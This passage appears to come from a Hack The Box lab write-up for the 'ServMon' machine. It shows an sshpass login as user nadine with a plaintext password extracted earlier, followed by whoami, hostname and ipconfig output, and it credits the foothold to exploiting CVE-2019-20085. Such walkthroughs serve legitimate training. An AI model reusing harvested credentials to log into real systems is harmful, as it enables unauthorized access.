SSH
The extracted credential appears to works for SSH as well
┌──(kali㉿kali)-[~/archive/htb/labs/servmon]
└─$ sshpass -p 'L1k3B1gBut7s@W0rk' ssh nadine@$IP
Microsoft Windows [Version 10.0.17763.864]
(c) 2018 Microsoft Corporation. All rights reserved.
nadine@servmon c:\Users\Nadine>
nadine@servmon c:\Users\Nadine> whoami
servmon\nadine
nadine@servmon c:\Users\Nadine> hostname
ServMon
nadine@servmon c:\Users\Nadine> ipconfig
Windows IP Configuration
ethernet adapter ethernet0:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::1d0
ipv6 address. . . . . . . . . . . : dead:beef::d42c:b14a:cca4:4258
link-local ipv6 address . . . . . : fe80::d42c:b14a:cca4:4258%6
ipv4 address. . . . . . . . . . . : 10.10.10.184
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%6
10.10.10.2Initial Foothold established to the target system as the nadine user via exploiting CVE-2019-20085 on the target web application